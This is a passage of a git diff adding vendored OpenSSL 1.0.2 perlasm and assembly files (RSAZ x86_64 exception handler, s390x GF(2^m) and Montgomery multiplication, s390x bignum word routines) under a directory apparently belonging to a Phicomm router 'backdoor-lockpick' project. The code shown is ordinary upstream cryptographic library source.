+.size	rsaz_512_gather4,.-rsaz_512_gather4
+___
+}
+
+# EXCEPTION_DISPOSITION handler (EXCEPTION_RECORD *rec,ULONG64 frame,
+#		CONTEXT *context,DISPATCHER_CONTEXT *disp)
+if ($win64) {
+$rec="%rcx";
+$frame="%rdx";
+$context="%r8";
+$disp="%r9";
+
+$code.=<<___;
+.extern	__imp_RtlVirtualUnwind
+.type	se_handler,\@abi-omnipotent
+.align	16
+se_handler:
+	push	%rsi
+	push	%rdi
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+	pushfq
+	sub	\$64,%rsp
+
+	mov	120($context),%rax	# pull context->Rax
+	mov	248($context),%rbx	# pull context->Rip
+
+	mov	8($disp),%rsi		# disp->ImageBase
+	mov	56($disp),%r11		# disp->HandlerData
+
+	mov	0(%r11),%r10d		# HandlerData[0]
+	lea	(%rsi,%r10),%r10	# end of prologue label
+	cmp	%r10,%rbx		# context->Rip<end of prologue label
+	jb	.Lcommon_seh_tail
+
+	mov	152($context),%rax	# pull context->Rsp
+
+	mov	4(%r11),%r10d		# HandlerData[1]
+	lea	(%rsi,%r10),%r10	# epilogue label
+	cmp	%r10,%rbx		# context->Rip>=epilogue label
+	jae	.Lcommon_seh_tail
+
+	lea	128+24+48(%rax),%rax
+
+	mov	-8(%rax),%rbx
+	mov	-16(%rax),%rbp
+	mov	-24(%rax),%r12
+	mov	-32(%rax),%r13
+	mov	-40(%rax),%r14
+	mov	-48(%rax),%r15
+	mov	%rbx,144($context)	# restore context->Rbx
+	mov	%rbp,160($context)	# restore context->Rbp
+	mov	%r12,216($context)	# restore context->R12
+	mov	%r13,224($context)	# restore context->R13
+	mov	%r14,232($context)	# restore context->R14
+	mov	%r15,240($context)	# restore context->R15
+
+.Lcommon_seh_tail:
+	mov	8(%rax),%rdi
+	mov	16(%rax),%rsi
+	mov	%rax,152($context)	# restore context->Rsp
+	mov	%rsi,168($context)	# restore context->Rsi
+	mov	%rdi,176($context)	# restore context->Rdi
+
+	mov	40($disp),%rdi		# disp->ContextRecord
+	mov	$context,%rsi		# context
+	mov	\$154,%ecx		# sizeof(CONTEXT)
+	.long	0xa548f3fc		# cld; rep movsq
+
+	mov	$disp,%rsi
+	xor	%rcx,%rcx		# arg1, UNW_FLAG_NHANDLER
+	mov	8(%rsi),%rdx		# arg2, disp->ImageBase
+	mov	0(%rsi),%r8		# arg3, disp->ControlPc
+	mov	16(%rsi),%r9		# arg4, disp->FunctionEntry
+	mov	40(%rsi),%r10		# disp->ContextRecord
+	lea	56(%rsi),%r11		# &disp->HandlerData
+	lea	24(%rsi),%r12		# &disp->EstablisherFrame
+	mov	%r10,32(%rsp)		# arg5
+	mov	%r11,40(%rsp)		# arg6
+	mov	%r12,48(%rsp)		# arg7
+	mov	%rcx,56(%rsp)		# arg8, (NULL)
+	call	*__imp_RtlVirtualUnwind(%rip)
+
+	mov	\$1,%eax		# ExceptionContinueSearch
+	add	\$64,%rsp
+	popfq
+	pop	%r15
+	pop	%r14
+	pop	%r13
+	pop	%r12
+	pop	%rbp
+	pop	%rbx
+	pop	%rdi
+	pop	%rsi
+	ret
+.size	sqr_handler,.-sqr_handler
+
+.section	.pdata
+.align	4
+	.rva	.LSEH_begin_rsaz_512_sqr
+	.rva	.LSEH_end_rsaz_512_sqr
+	.rva	.LSEH_info_rsaz_512_sqr
+
+	.rva	.LSEH_begin_rsaz_512_mul
+	.rva	.LSEH_end_rsaz_512_mul
+	.rva	.LSEH_info_rsaz_512_mul
+
+	.rva	.LSEH_begin_rsaz_512_mul_gather4
+	.rva	.LSEH_end_rsaz_512_mul_gather4
+	.rva	.LSEH_info_rsaz_512_mul_gather4
+
+	.rva	.LSEH_begin_rsaz_512_mul_scatter4
+	.rva	.LSEH_end_rsaz_512_mul_scatter4
+	.rva	.LSEH_info_rsaz_512_mul_scatter4
+
+	.rva	.LSEH_begin_rsaz_512_mul_by_one
+	.rva	.LSEH_end_rsaz_512_mul_by_one
+	.rva	.LSEH_info_rsaz_512_mul_by_one
+
+.section	.xdata
+.align	8
+.LSEH_info_rsaz_512_sqr:
+	.byte	9,0,0,0
+	.rva	se_handler
+	.rva	.Lsqr_body,.Lsqr_epilogue			# HandlerData[]
+.LSEH_info_rsaz_512_mul:
+	.byte	9,0,0,0
+	.rva	se_handler
+	.rva	.Lmul_body,.Lmul_epilogue			# HandlerData[]
+.LSEH_info_rsaz_512_mul_gather4:
+	.byte	9,0,0,0
+	.rva	se_handler
+	.rva	.Lmul_gather4_body,.Lmul_gather4_epilogue	# HandlerData[]
+.LSEH_info_rsaz_512_mul_scatter4:
+	.byte	9,0,0,0
+	.rva	se_handler
+	.rva	.Lmul_scatter4_body,.Lmul_scatter4_epilogue	# HandlerData[]
+.LSEH_info_rsaz_512_mul_by_one:
+	.byte	9,0,0,0
+	.rva	se_handler
+	.rva	.Lmul_by_one_body,.Lmul_by_one_epilogue		# HandlerData[]
+___
+}
+
+$code =~ s/\`([^\`]*)\`/eval $1/gem;
+print $code;
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/s390x-gf2m.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/s390x-gf2m.pl
new file mode 100644
index 0000000..cd9f13e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/s390x-gf2m.pl
@@ -0,0 +1,221 @@
+#!/usr/bin/env perl
+#
+# ====================================================================
+# Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+#
+# May 2011
+#
+# The module implements bn_GF2m_mul_2x2 polynomial multiplication used
+# in bn_gf2m.c. It's kind of low-hanging mechanical port from C for
+# the time being... gcc 4.3 appeared to generate poor code, therefore
+# the effort. And indeed, the module delivers 55%-90%(*) improvement
+# on haviest ECDSA verify and ECDH benchmarks for 163- and 571-bit
+# key lengths on z990, 30%-55%(*) - on z10, and 70%-110%(*) - on z196.
+# This is for 64-bit build. In 32-bit "highgprs" case improvement is
+# even higher, for example on z990 it was measured 80%-150%. ECDSA
+# sign is modest 9%-12% faster. Keep in mind that these coefficients
+# are not ones for bn_GF2m_mul_2x2 itself, as not all CPU time is
+# burnt in it...
+#
+# (*)	gcc 4.1 was observed to deliver better results than gcc 4.3,
+#	so that improvement coefficients can vary from one specific
+#	setup to another.
+
+$flavour = shift;
+
+if ($flavour =~ /3[12]/) {
+        $SIZE_T=4;
+        $g="";
+} else {
+        $SIZE_T=8;
+        $g="g";
+}
+
+while (($output=shift) && ($output!~/^\w[\w\-]*\.\w+$/)) {}
+open STDOUT,">$output";
+
+$stdframe=16*$SIZE_T+4*8;
+
+$rp="%r2";
+$a1="%r3";
+$a0="%r4";
+$b1="%r5";
+$b0="%r6";
+
+$ra="%r14";
+$sp="%r15";
+
+@T=("%r0","%r1");
+@i=("%r12","%r13");
+
+($a1,$a2,$a4,$a8,$a12,$a48)=map("%r$_",(6..11));
+($lo,$hi,$b)=map("%r$_",(3..5)); $a=$lo; $mask=$a8;
+
+$code.=<<___;
+.text
+
+.type	_mul_1x1,\@function
+.align	16
+_mul_1x1:
+	lgr	$a1,$a
+	sllg	$a2,$a,1
+	sllg	$a4,$a,2
+	sllg	$a8,$a,3
+
+	srag	$lo,$a1,63			# broadcast 63rd bit
+	nihh	$a1,0x1fff
+	srag	@i[0],$a2,63			# broadcast 62nd bit
+	nihh	$a2,0x3fff
+	srag	@i[1],$a4,63			# broadcast 61st bit
+	nihh	$a4,0x7fff
+	ngr	$lo,$b
+	ngr	@i[0],$b
+	ngr	@i[1],$b
+
+	lghi	@T[0],0
+	lgr	$a12,$a1
+	stg	@T[0],`$stdframe+0*8`($sp)	# tab[0]=0
+	xgr	$a12,$a2
+	stg	$a1,`$stdframe+1*8`($sp)	# tab[1]=a1
+	 lgr	$a48,$a4
+	stg	$a2,`$stdframe+2*8`($sp)	# tab[2]=a2
+	 xgr	$a48,$a8
+	stg	$a12,`$stdframe+3*8`($sp)	# tab[3]=a1^a2
+	 xgr	$a1,$a4
+
+	stg	$a4,`$stdframe+4*8`($sp)	# tab[4]=a4
+	xgr	$a2,$a4
+	stg	$a1,`$stdframe+5*8`($sp)	# tab[5]=a1^a4
+	xgr	$a12,$a4
+	stg	$a2,`$stdframe+6*8`($sp)	# tab[6]=a2^a4
+	 xgr	$a1,$a48
+	stg	$a12,`$stdframe+7*8`($sp)	# tab[7]=a1^a2^a4
+	 xgr	$a2,$a48
+
+	stg	$a8,`$stdframe+8*8`($sp)	# tab[8]=a8
+	xgr	$a12,$a48
+	stg	$a1,`$stdframe+9*8`($sp)	# tab[9]=a1^a8
+	 xgr	$a1,$a4
+	stg	$a2,`$stdframe+10*8`($sp)	# tab[10]=a2^a8
+	 xgr	$a2,$a4
+	stg	$a12,`$stdframe+11*8`($sp)	# tab[11]=a1^a2^a8
+
+	xgr	$a12,$a4
+	stg	$a48,`$stdframe+12*8`($sp)	# tab[12]=a4^a8
+	 srlg	$hi,$lo,1
+	stg	$a1,`$stdframe+13*8`($sp)	# tab[13]=a1^a4^a8
+	 sllg	$lo,$lo,63
+	stg	$a2,`$stdframe+14*8`($sp)	# tab[14]=a2^a4^a8
+	 srlg	@T[0],@i[0],2
+	stg	$a12,`$stdframe+15*8`($sp)	# tab[15]=a1^a2^a4^a8
+
+	lghi	$mask,`0xf<<3`
+	sllg	$a1,@i[0],62
+	 sllg	@i[0],$b,3
+	srlg	@T[1],@i[1],3
+	 ngr	@i[0],$mask
+	sllg	$a2,@i[1],61
+	 srlg	@i[1],$b,4-3
+	xgr	$hi,@T[0]
+	 ngr	@i[1],$mask
+	xgr	$lo,$a1
+	xgr	$hi,@T[1]
+	xgr	$lo,$a2
+
+	xg	$lo,$stdframe(@i[0],$sp)
+	srlg	@i[0],$b,8-3
+	ngr	@i[0],$mask
+___
+for($n=1;$n<14;$n++) {
+$code.=<<___;
+	lg	@T[1],$stdframe(@i[1],$sp)
+	srlg	@i[1],$b,`($n+2)*4`-3
+	sllg	@T[0],@T[1],`$n*4`
+	ngr	@i[1],$mask
+	srlg	@T[1],@T[1],`64-$n*4`
+	xgr	$lo,@T[0]
+	xgr	$hi,@T[1]
+___
+	push(@i,shift(@i)); push(@T,shift(@T));
+}
+$code.=<<___;
+	lg	@T[1],$stdframe(@i[1],$sp)
+	sllg	@T[0],@T[1],`$n*4`
+	srlg	@T[1],@T[1],`64-$n*4`
+	xgr	$lo,@T[0]
+	xgr	$hi,@T[1]
+
+	lg	@T[0],$stdframe(@i[0],$sp)
+	sllg	@T[1],@T[0],`($n+1)*4`
+	srlg	@T[0],@T[0],`64-($n+1)*4`
+	xgr	$lo,@T[1]
+	xgr	$hi,@T[0]
+
+	br	$ra
+.size	_mul_1x1,.-_mul_1x1
+
+.globl	bn_GF2m_mul_2x2
+.type	bn_GF2m_mul_2x2,\@function
+.align	16
+bn_GF2m_mul_2x2:
+	stm${g}	%r3,%r15,3*$SIZE_T($sp)
+
+	lghi	%r1,-$stdframe-128
+	la	%r0,0($sp)
+	la	$sp,0(%r1,$sp)			# alloca
+	st${g}	%r0,0($sp)			# back chain
+___
+if ($SIZE_T==8) {
+my @r=map("%r$_",(6..9));
+$code.=<<___;
+	bras	$ra,_mul_1x1			# a1·b1
+	stmg	$lo,$hi,16($rp)
+
+	lg	$a,`$stdframe+128+4*$SIZE_T`($sp)
+	lg	$b,`$stdframe+128+6*$SIZE_T`($sp)
+	bras	$ra,_mul_1x1			# a0·b0
+	stmg	$lo,$hi,0($rp)
+
+	lg	$a,`$stdframe+128+3*$SIZE_T`($sp)
+	lg	$b,`$stdframe+128+5*$SIZE_T`($sp)
+	xg	$a,`$stdframe+128+4*$SIZE_T`($sp)
+	xg	$b,`$stdframe+128+6*$SIZE_T`($sp)
+	bras	$ra,_mul_1x1			# (a0+a1)·(b0+b1)
+	lmg	@r[0],@r[3],0($rp)
+
+	xgr	$lo,$hi
+	xgr	$hi,@r[1]
+	xgr	$lo,@r[0]
+	xgr	$hi,@r[2]
+	xgr	$lo,@r[3]	
+	xgr	$hi,@r[3]
+	xgr	$lo,$hi
+	stg	$hi,16($rp)
+	stg	$lo,8($rp)
+___
+} else {
+$code.=<<___;
+	sllg	%r3,%r3,32
+	sllg	%r5,%r5,32
+	or	%r3,%r4
+	or	%r5,%r6
+	bras	$ra,_mul_1x1
+	rllg	$lo,$lo,32
+	rllg	$hi,$hi,32
+	stmg	$lo,$hi,0($rp)
+___
+}
+$code.=<<___;
+	lm${g}	%r6,%r15,`$stdframe+128+6*$SIZE_T`($sp)
+	br	$ra
+.size	bn_GF2m_mul_2x2,.-bn_GF2m_mul_2x2
+.string	"GF(2^m) Multiplication for s390x, CRYPTOGAMS by <appro\@openssl.org>"
+___
+
+$code =~ s/\`([^\`]*)\`/eval($1)/gem;
+print $code;
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/s390x-mont.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/s390x-mont.pl
new file mode 100644
index 0000000..9fd64e8
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/s390x-mont.pl
@@ -0,0 +1,277 @@
+#!/usr/bin/env perl
+
+# ====================================================================
+# Written by Andy Polyakov <appro@fy.chalmers.se> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+
+# April 2007.
+#
+# Performance improvement over vanilla C code varies from 85% to 45%
+# depending on key length and benchmark. Unfortunately in this context
+# these are not very impressive results [for code that utilizes "wide"
+# 64x64=128-bit multiplication, which is not commonly available to C
+# programmers], at least hand-coded bn_asm.c replacement is known to
+# provide 30-40% better results for longest keys. Well, on a second
+# thought it's not very surprising, because z-CPUs are single-issue
+# and _strictly_ in-order execution, while bn_mul_mont is more or less
+# dependent on CPU ability to pipe-line instructions and have several
+# of them "in-flight" at the same time. I mean while other methods,
+# for example Karatsuba, aim to minimize amount of multiplications at
+# the cost of other operations increase, bn_mul_mont aim to neatly
+# "overlap" multiplications and the other operations [and on most
+# platforms even minimize the amount of the other operations, in
+# particular references to memory]. But it's possible to improve this
+# module performance by implementing dedicated squaring code-path and
+# possibly by unrolling loops...
+
+# January 2009.
+#
+# Reschedule to minimize/avoid Address Generation Interlock hazard,
+# make inner loops counter-based.
+
+# November 2010.
+#
+# Adapt for -m31 build. If kernel supports what's called "highgprs"
+# feature on Linux [see /proc/cpuinfo], it's possible to use 64-bit
+# instructions and achieve "64-bit" performance even in 31-bit legacy
+# application context. The feature is not specific to any particular
+# processor, as long as it's "z-CPU". Latter implies that the code
+# remains z/Architecture specific. Compatibility with 32-bit BN_ULONG
+# is achieved by swapping words after 64-bit loads, follow _dswap-s.
+# On z990 it was measured to perform 2.6-2.2 times better than
+# compiler-generated code, less for longer keys...
+
+$flavour = shift;
+
+if ($flavour =~ /3[12]/) {
+	$SIZE_T=4;
+	$g="";
+} else {
+	$SIZE_T=8;
+	$g="g";
+}
+
+while (($output=shift) && ($output!~/^\w[\w\-]*\.\w+$/)) {}
+open STDOUT,">$output";
+
+$stdframe=16*$SIZE_T+4*8;
+
+$mn0="%r0";
+$num="%r1";
+
+# int bn_mul_mont(
+$rp="%r2";		# BN_ULONG *rp,
+$ap="%r3";		# const BN_ULONG *ap,
+$bp="%r4";		# const BN_ULONG *bp,
+$np="%r5";		# const BN_ULONG *np,
+$n0="%r6";		# const BN_ULONG *n0,
+#$num="160(%r15)"	# int num);
+
+$bi="%r2";	# zaps rp
+$j="%r7";
+
+$ahi="%r8";
+$alo="%r9";
+$nhi="%r10";
+$nlo="%r11";
+$AHI="%r12";
+$NHI="%r13";
+$count="%r14";
+$sp="%r15";
+
+$code.=<<___;
+.text
+.globl	bn_mul_mont
+.type	bn_mul_mont,\@function
+bn_mul_mont:
+	lgf	$num,`$stdframe+$SIZE_T-4`($sp)	# pull $num
+	sla	$num,`log($SIZE_T)/log(2)`	# $num to enumerate bytes
+	la	$bp,0($num,$bp)
+
+	st${g}	%r2,2*$SIZE_T($sp)
+
+	cghi	$num,16		#
+	lghi	%r2,0		#
+	blr	%r14		# if($num<16) return 0;
+___
+$code.=<<___ if ($flavour =~ /3[12]/);
+	tmll	$num,4
+	bnzr	%r14		# if ($num&1) return 0;
+___
+$code.=<<___ if ($flavour !~ /3[12]/);
+	cghi	$num,96		#
+	bhr	%r14		# if($num>96) return 0;
+___
+$code.=<<___;
+	stm${g}	%r3,%r15,3*$SIZE_T($sp)
+
+	lghi	$rp,-$stdframe-8	# leave room for carry bit
+	lcgr	$j,$num		# -$num
+	lgr	%r0,$sp
+	la	$rp,0($rp,$sp)
+	la	$sp,0($j,$rp)	# alloca
+	st${g}	%r0,0($sp)	# back chain
+
+	sra	$num,3		# restore $num
+	la	$bp,0($j,$bp)	# restore $bp
+	ahi	$num,-1		# adjust $num for inner loop
+	lg	$n0,0($n0)	# pull n0
+	_dswap	$n0
+
+	lg	$bi,0($bp)
+	_dswap	$bi
+	lg	$alo,0($ap)
+	_dswap	$alo
+	mlgr	$ahi,$bi	# ap[0]*bp[0]
+	lgr	$AHI,$ahi
+
+	lgr	$mn0,$alo	# "tp[0]"*n0
+	msgr	$mn0,$n0
+
+	lg	$nlo,0($np)	#
+	_dswap	$nlo
+	mlgr	$nhi,$mn0	# np[0]*m1
+	algr	$nlo,$alo	# +="tp[0]"
+	lghi	$NHI,0
+	alcgr	$NHI,$nhi
+
+	la	$j,8(%r0)	# j=1
+	lr	$count,$num
+
+.align	16
+.L1st:
+	lg	$alo,0($j,$ap)
+	_dswap	$alo
+	mlgr	$ahi,$bi	# ap[j]*bp[0]
+	algr	$alo,$AHI
+	lghi	$AHI,0
+	alcgr	$AHI,$ahi
+
+	lg	$nlo,0($j,$np)
+	_dswap	$nlo
+	mlgr	$nhi,$mn0	# np[j]*m1
+	algr	$nlo,$NHI
+	lghi	$NHI,0
+	alcgr	$nhi,$NHI	# +="tp[j]"
+	algr	$nlo,$alo
+	alcgr	$NHI,$nhi
+
+	stg	$nlo,$stdframe-8($j,$sp)	# tp[j-1]=
+	la	$j,8($j)	# j++
+	brct	$count,.L1st
+
+	algr	$NHI,$AHI
+	lghi	$AHI,0
+	alcgr	$AHI,$AHI	# upmost overflow bit
+	stg	$NHI,$stdframe-8($j,$sp)
+	stg	$AHI,$stdframe($j,$sp)
+	la	$bp,8($bp)	# bp++
+
+.Louter:
+	lg	$bi,0($bp)	# bp[i]
+	_dswap	$bi
+	lg	$alo,0($ap)
+	_dswap	$alo
+	mlgr	$ahi,$bi	# ap[0]*bp[i]
+	alg	$alo,$stdframe($sp)	# +=tp[0]
+	lghi	$AHI,0
+	alcgr	$AHI,$ahi
+
+	lgr	$mn0,$alo
+	msgr	$mn0,$n0	# tp[0]*n0
+
+	lg	$nlo,0($np)	# np[0]
+	_dswap	$nlo
+	mlgr	$nhi,$mn0	# np[0]*m1
+	algr	$nlo,$alo	# +="tp[0]"
+	lghi	$NHI,0
+	alcgr	$NHI,$nhi
+
+	la	$j,8(%r0)	# j=1
+	lr	$count,$num
+
+.align	16
+.Linner:
+	lg	$alo,0($j,$ap)
+	_dswap	$alo
+	mlgr	$ahi,$bi	# ap[j]*bp[i]
+	algr	$alo,$AHI
+	lghi	$AHI,0
+	alcgr	$ahi,$AHI
+	alg	$alo,$stdframe($j,$sp)# +=tp[j]
+	alcgr	$AHI,$ahi
+
+	lg	$nlo,0($j,$np)
+	_dswap	$nlo
+	mlgr	$nhi,$mn0	# np[j]*m1
+	algr	$nlo,$NHI
+	lghi	$NHI,0
+	alcgr	$nhi,$NHI
+	algr	$nlo,$alo	# +="tp[j]"
+	alcgr	$NHI,$nhi
+
+	stg	$nlo,$stdframe-8($j,$sp)	# tp[j-1]=
+	la	$j,8($j)	# j++
+	brct	$count,.Linner
+
+	algr	$NHI,$AHI
+	lghi	$AHI,0
+	alcgr	$AHI,$AHI
+	alg	$NHI,$stdframe($j,$sp)# accumulate previous upmost overflow bit
+	lghi	$ahi,0
+	alcgr	$AHI,$ahi	# new upmost overflow bit
+	stg	$NHI,$stdframe-8($j,$sp)
+	stg	$AHI,$stdframe($j,$sp)
+
+	la	$bp,8($bp)	# bp++
+	cl${g}	$bp,`$stdframe+8+4*$SIZE_T`($j,$sp)	# compare to &bp[num]
+	jne	.Louter
+
+	l${g}	$rp,`$stdframe+8+2*$SIZE_T`($j,$sp)	# reincarnate rp
+	la	$ap,$stdframe($sp)
+	ahi	$num,1		# restore $num, incidentally clears "borrow"
+
+	la	$j,0(%r0)
+	lr	$count,$num
+.Lsub:	lg	$alo,0($j,$ap)
+	lg	$nlo,0($j,$np)
+	_dswap	$nlo
+	slbgr	$alo,$nlo
+	stg	$alo,0($j,$rp)
+	la	$j,8($j)
+	brct	$count,.Lsub
+	lghi	$ahi,0
+	slbgr	$AHI,$ahi	# handle upmost carry
+
+	ngr	$ap,$AHI
+	lghi	$np,-1
+	xgr	$np,$AHI
+	ngr	$np,$rp
+	ogr	$ap,$np		# ap=borrow?tp:rp
+
+	la	$j,0(%r0)
+	lgr	$count,$num
+.Lcopy:	lg	$alo,0($j,$ap)		# copy or in-place refresh
+	_dswap	$alo
+	stg	$j,$stdframe($j,$sp)	# zap tp
+	stg	$alo,0($j,$rp)
+	la	$j,8($j)
+	brct	$count,.Lcopy
+
+	la	%r1,`$stdframe+8+6*$SIZE_T`($j,$sp)
+	lm${g}	%r6,%r15,0(%r1)
+	lghi	%r2,1		# signal "processed"
+	br	%r14
+.size	bn_mul_mont,.-bn_mul_mont
+.string	"Montgomery Multiplication for s390x, CRYPTOGAMS by <appro\@openssl.org>"
+___
+
+foreach (split("\n",$code)) {
+	s/\`([^\`]*)\`/eval $1/ge;
+	s/_dswap\s+(%r[0-9]+)/sprintf("rllg\t%s,%s,32",$1,$1) if($SIZE_T==4)/e;
+	print $_,"\n";
+}
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/s390x.S b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/s390x.S
new file mode 100755
index 0000000..43fcb79
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/s390x.S
@@ -0,0 +1,678 @@
+.ident "s390x.S, version 1.1"
+// ====================================================================
+// Written by Andy Polyakov <appro@fy.chalmers.se> for the OpenSSL
+// project.
+//
+// Rights for redistribution and usage in source and binary forms are
+// granted according to the OpenSSL license. Warranty of any kind is
+// disclaimed.
+// ====================================================================
+
+.text
+
+#define zero	%r0
+
+// BN_ULONG bn_mul_add_words(BN_ULONG *r2,BN_ULONG *r3,int r4,BN_ULONG r5);
+.globl	bn_mul_add_words
+.type	bn_mul_add_words,@function
+.align	4
+bn_mul_add_words:
+	lghi	zero,0		// zero = 0
+	la	%r1,0(%r2)	// put rp aside
+	lghi	%r2,0		// i=0;
+	ltgfr	%r4,%r4
+	bler	%r14		// if (len<=0) return 0;
+
+	stmg	%r6,%r10,48(%r15)
+	lghi	%r10,3
+	lghi	%r8,0		// carry = 0
+	nr	%r10,%r4	// len%4
+	sra	%r4,2		// cnt=len/4
+	jz	.Loop1_madd	// carry is incidentally cleared if branch taken
+	algr	zero,zero	// clear carry
+
+.Loop4_madd:
+	lg	%r7,0(%r2,%r3)	// ap[i]
+	mlgr	%r6,%r5		// *=w
+	alcgr	%r7,%r8		// +=carry
+	alcgr	%r6,zero
+	alg	%r7,0(%r2,%r1)	// +=rp[i]
+	stg	%r7,0(%r2,%r1)	// rp[i]=
+
+	lg	%r9,8(%r2,%r3)
+	mlgr	%r8,%r5
+	alcgr	%r9,%r6
+	alcgr	%r8,zero
+	alg	%r9,8(%r2,%r1)
+	stg	%r9,8(%r2,%r1)
+
+	lg	%r7,16(%r2,%r3)
+	mlgr	%r6,%r5
+	alcgr	%r7,%r8
+	alcgr	%r6,zero
+	alg	%r7,16(%r2,%r1)
+	stg	%r7,16(%r2,%r1)
+
+	lg	%r9,24(%r2,%r3)
+	mlgr	%r8,%r5
+	alcgr	%r9,%r6
+	alcgr	%r8,zero
+	alg	%r9,24(%r2,%r1)
+	stg	%r9,24(%r2,%r1)
+
+	la	%r2,32(%r2)	// i+=4
+	brct	%r4,.Loop4_madd
+
+	la	%r10,1(%r10)		// see if len%4 is zero ...
+	brct	%r10,.Loop1_madd	// without touching condition code:-)
+
+.Lend_madd:
+	alcgr	%r8,zero	// collect carry bit
+	lgr	%r2,%r8
+	lmg	%r6,%r10,48(%r15)
+	br	%r14
+
+.Loop1_madd:
+	lg	%r7,0(%r2,%r3)	// ap[i]
+	mlgr	%r6,%r5		// *=w
+	alcgr	%r7,%r8		// +=carry
+	alcgr	%r6,zero
+	alg	%r7,0(%r2,%r1)	// +=rp[i]
+	stg	%r7,0(%r2,%r1)	// rp[i]=
+
+	lgr	%r8,%r6
+	la	%r2,8(%r2)	// i++
+	brct	%r10,.Loop1_madd
+
+	j	.Lend_madd
+.size	bn_mul_add_words,.-bn_mul_add_words
+
+// BN_ULONG bn_mul_words(BN_ULONG *r2,BN_ULONG *r3,int r4,BN_ULONG r5);
+.globl	bn_mul_words
+.type	bn_mul_words,@function
+.align	4
+bn_mul_words:
+	lghi	zero,0		// zero = 0
+	la	%r1,0(%r2)	// put rp aside
+	lghi	%r2,0		// i=0;
+	ltgfr	%r4,%r4
+	bler	%r14		// if (len<=0) return 0;
+
+	stmg	%r6,%r10,48(%r15)
+	lghi	%r10,3
+	lghi	%r8,0		// carry = 0
+	nr	%r10,%r4	// len%4
+	sra	%r4,2		// cnt=len/4
+	jz	.Loop1_mul	// carry is incidentally cleared if branch taken
+	algr	zero,zero	// clear carry
+
+.Loop4_mul:
+	lg	%r7,0(%r2,%r3)	// ap[i]
+	mlgr	%r6,%r5		// *=w
+	alcgr	%r7,%r8		// +=carry
+	stg	%r7,0(%r2,%r1)	// rp[i]=
+
+	lg	%r9,8(%r2,%r3)
+	mlgr	%r8,%r5
+	alcgr	%r9,%r6
+	stg	%r9,8(%r2,%r1)
+
+	lg	%r7,16(%r2,%r3)
+	mlgr	%r6,%r5
+	alcgr	%r7,%r8
+	stg	%r7,16(%r2,%r1)
+
+	lg	%r9,24(%r2,%r3)
+	mlgr	%r8,%r5
+	alcgr	%r9,%r6
+	stg	%r9,24(%r2,%r1)
+
+	la	%r2,32(%r2)	// i+=4
+	brct	%r4,.Loop4_mul
+
+	la	%r10,1(%r10)		// see if len%4 is zero ...
+	brct	%r10,.Loop1_mul		// without touching condition code:-)
+
+.Lend_mul:
+	alcgr	%r8,zero	// collect carry bit
+	lgr	%r2,%r8
+	lmg	%r6,%r10,48(%r15)
+	br	%r14
+
+.Loop1_mul:
+	lg	%r7,0(%r2,%r3)	// ap[i]
+	mlgr	%r6,%r5		// *=w
+	alcgr	%r7,%r8		// +=carry
+	stg	%r7,0(%r2,%r1)	// rp[i]=
+
+	lgr	%r8,%r6
+	la	%r2,8(%r2)	// i++
+	brct	%r10,.Loop1_mul
+
+	j	.Lend_mul
+.size	bn_mul_words,.-bn_mul_words
+
+// void bn_sqr_words(BN_ULONG *r2,BN_ULONG *r2,int r4)
+.globl	bn_sqr_words
+.type	bn_sqr_words,@function
+.align	4
+bn_sqr_words:
+	ltgfr	%r4,%r4
+	bler	%r14
+
+	stmg	%r6,%r7,48(%r15)
+	srag	%r1,%r4,2	// cnt=len/4
+	jz	.Loop1_sqr
+
+.Loop4_sqr:
+	lg	%r7,0(%r3)
+	mlgr	%r6,%r7
+	stg	%r7,0(%r2)
+	stg	%r6,8(%r2)
+
+	lg	%r7,8(%r3)
+	mlgr	%r6,%r7
+	stg	%r7,16(%r2)
+	stg	%r6,24(%r2)
+
+	lg	%r7,16(%r3)
+	mlgr	%r6,%r7
+	stg	%r7,32(%r2)
+	stg	%r6,40(%r2)
+
+	lg	%r7,24(%r3)
+	mlgr	%r6,%r7
+	stg	%r7,48(%r2)
+	stg	%r6,56(%r2)
+
+	la	%r3,32(%r3)
+	la	%r2,64(%r2)
+	brct	%r1,.Loop4_sqr
+
+	lghi	%r1,3
+	nr	%r4,%r1		// cnt=len%4
+	jz	.Lend_sqr
+
+.Loop1_sqr:
+	lg	%r7,0(%r3)
+	mlgr	%r6,%r7
+	stg	%r7,0(%r2)
+	stg	%r6,8(%r2)
+
+	la	%r3,8(%r3)
+	la	%r2,16(%r2)
+	brct	%r4,.Loop1_sqr
+
+.Lend_sqr:
+	lmg	%r6,%r7,48(%r15)
+	br	%r14
+.size	bn_sqr_words,.-bn_sqr_words
+
+// BN_ULONG bn_div_words(BN_ULONG h,BN_ULONG l,BN_ULONG d);
+.globl	bn_div_words
+.type	bn_div_words,@function
+.align	4
+bn_div_words:
+	dlgr	%r2,%r4
+	lgr	%r2,%r3
+	br	%r14
+.size	bn_div_words,.-bn_div_words
+
+// BN_ULONG bn_add_words(BN_ULONG *r2,BN_ULONG *r3,BN_ULONG *r4,int r5);
+.globl	bn_add_words
+.type	bn_add_words,@function
+.align	4
+bn_add_words:
+	la	%r1,0(%r2)	// put rp aside
+	lghi	%r2,0		// i=0
+	ltgfr	%r5,%r5
+	bler	%r14		// if (len<=0) return 0;
+
+	stg	%r6,48(%r15)
+	lghi	%r6,3
